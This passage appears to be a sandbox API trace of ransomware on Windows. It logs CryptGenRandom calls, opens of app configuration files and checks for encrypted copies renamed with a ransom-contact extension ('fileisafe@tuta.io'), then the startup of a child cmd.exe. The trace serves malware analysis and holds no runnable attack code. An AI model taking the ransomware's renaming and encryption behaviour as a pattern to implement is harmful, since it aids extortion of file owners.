(hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.225] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.226] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.227] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.228] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.229] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.230] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.231] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.231] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.231] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.231] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0140.231] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0xffffffff) returned 0x0 [0151.674] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x366fef0 | out: pbBuffer=0x366fef0) returned 1 [0151.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.708] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x366fe88 | out: lpFileSize=0x366fe88*=88064) returned 1 [0151.708] CloseHandle (hObject=0x308) returned 1 [0151.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0151.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.708] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingfinance_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0151.728] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x366fef0 | out: pbBuffer=0x366fef0) returned 1 [0151.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.730] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x366fe88 | out: lpFileSize=0x366fe88*=110592) returned 1 [0151.730] CloseHandle (hObject=0x2f0) returned 1 [0151.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0151.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0151.837] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x366fef0 | out: pbBuffer=0x366fef0) returned 1 [0151.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.838] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x366fe88 | out: lpFileSize=0x366fe88*=146432) returned 1 [0151.838] CloseHandle (hObject=0x2f0) returned 1 [0151.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0151.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0152.059] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x366fef0 | out: pbBuffer=0x366fef0) returned 1 [0152.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0152.061] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x366fe88 | out: lpFileSize=0x366fe88*=147456) returned 1 [0152.061] CloseHandle (hObject=0x308) returned 1 [0152.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0152.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2d199000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xf00" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0xf34 [0135.902] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6de050000 [0135.902] __set_app_type (_Type=0x1) [0135.902] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6de066d00) returned 0x0 [0135.902] __getmainargs (in: _Argc=0x7ff6de089200, _Argv=0x7ff6de089208, _Env=0x7ff6de089210, _DoWildCard=0, _StartInfo=0x7ff6de08921c | out: _Argc=0x7ff6de089200, _Argv=0x7ff6de089208, _Env=0x7ff6de089210) returned 0 [0135.902] _onexit (_Func=0x7ff6de067fd0) returned 0x7ff6de067fd0 [0135.902] _onexit (_Func=0x7ff6de067fe0) returned 0x7ff6de067fe0 [0135.902] _onexit (_Func=0x7ff6de067ff0) returned 0x7ff6de067ff0 [0135.902] _onexit (_Func=0x7ff6de068000) returned 0x7ff6de068000 [0135.903] _onexit (_Func=0x7ff6de068010) returned 0x7ff6de068010 [0135.903] _onexit (_Func=0x7ff6de068020) returned 0x7ff6de068020 [0135.903] GetCurrentThreadId () returned 0xf34 [0135.903] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf34) returned 0x70 [0135.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffe6b4d0000 [0135.904] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="SetThreadUILanguage") returned 0x7ffe6b4ea990 [0135.904] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.915] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x8dc3d4f908 | out: phkResult=0x8dc3d4f908*=0x0) returned 0x2 [0135.915] VirtualQuery (in: lpAddress=0x8dc3d4f8f4, lpBuffer=0x8dc3d4f870, dwLength=0x30 | out: lpBuffer=0x8dc3d4f870*(BaseAddress=0x8dc3d4f000, AllocationBase=0x8dc3c50000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.915] VirtualQuery (in: lpAddress=0x8dc3c50000, lpBuffer=0x8dc3d4f870, dwLength=0x30 | out: lpBuffer=0x8dc3d4f870*(BaseAddress=0x8dc3c50000, AllocationBase=0x8dc3c50000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.915] VirtualQuery (in: lpAddress=0x8dc3c51000, lpBuffer=0x8dc3d4f870, dwLength=0x30 | out: lpBuffer=0x8dc3d4f870*(BaseAddress=0x8dc3c51000, AllocationBase=0x8dc3c50000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.915] VirtualQuery (in: lpAddress=0x8dc3c54000, lpBuffer=0x8dc3d4f870, dwLength=0x30 | out: lpBuffer=0x8dc3d4f870*(BaseAddress=0x8dc3c54000, AllocationBase=0x8dc3c50000, AllocationProtect=0x4, __alignment1=0xffffae0d, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.915] VirtualQuery (in: lpAddress=0x8dc3d50000, lpBuffer=0x8dc3d4f870, dwLength=0x30 | out: lpBuffer=0x8dc3d4f870*(BaseAddress=0x8dc3d50000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xffffae0d, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0135.915] GetConsoleOutputCP () returned 0x1b5 [0135.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0135.943] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6de078150, Add=1) returned 1 [0135.943] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.943] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6de08fc04 | out: lpMode=0x7ff6de08fc04) returned 0 [0135.943] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.943] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6de08fc00 | out: lpMode=0x7ff6de08fc00) returned 0 [0135.943] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.943] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0135.943] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.943] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6de08fc08 | out: lpMode=0x7ff6de08fc08) returned 0 [0135.943] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.943] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6de08fc0c | out: lpMode=0x7ff6de08fc0c) returned 0 [0135.943] GetEnvironmentStringsW () returned 0x27a547e5a10* [0135.943] GetProcessHeap () returned 0x27a547e0000 [0135.943] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xa7c) returned 0x27a547e64a0 [0135.943] FreeEnvironmentStringsA (penv="A") returned 1 [0135.943] GetProcessHeap () returned 0x27a547e0000 [0135.943] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x8) returned 0x27a547e6f30 [0135.943] GetEnvironmentStringsW () returned 0x27a547e5a10* [0135.943] GetProcessHeap () returned 0x27a547e0000 [0135.943] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xa7c) returned 0x27a547e6f50 [0135.944] FreeEnvironmentStringsA (penv="A") returned 1 [0135.944] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x8dc3d4e7b8 | out: phkResult=0x8dc3d4e7b8*=0x7c) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x0, lpData=0x8dc3d4e7d0*=0x4, lpcbData=0x8dc3d4e7b4*=0x1000) returned 0x2 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x1, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x0, lpData=0x8dc3d4e7d0*=0x1, lpcbData=0x8dc3d4e7b4*=0x1000) returned 0x2 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x0, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x40, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x40, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x0, lpData=0x8dc3d4e7d0*=0x40, lpcbData=0x8dc3d4e7b4*=0x1000) returned 0x2 [0135.944] RegCloseKey (hKey=0x7c) returned 0x0 [0135.944] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x8dc3d4e7b8 | out: phkResult=0x8dc3d4e7b8*=0x7c) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x0, lpData=0x8dc3d4e7d0*=0x40, lpcbData=0x8dc3d4e7b4*=0x1000) returned 0x2 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x1, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x0, lpData=0x8dc3d4e7d0*=0x1, lpcbData=0x8dc3d4e7b4*=0x1000) returned 0x2 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x0, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x9, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x4, lpData=0x8dc3d4e7d0*=0x9, lpcbData=0x8dc3d4e7b4*=0x4) returned 0x0 [0135.944] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x8dc3d4e7b0, lpData=0x8dc3d4e7d0, lpcbData=0x8dc3d4e7b4*=0x1000 | out: lpType=0x8dc3d4e7b0*=0x0, lpData=0x8dc3d4e7d0*=0x9, lpcbData=0x8dc3d4e7b4*=0x1000) returned 0x2 [0135.944] RegCloseKey (hKey=0x7c) returned 0x0 [0135.944] time (in: timer=0x0 | out: timer=0x0) returned 0x5d1e4852 [0135.944] srand (_Seed=0x5d1e4852) [0135.944] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0135.944] malloc (_Size=0x4000) returned 0x27a54b854f0 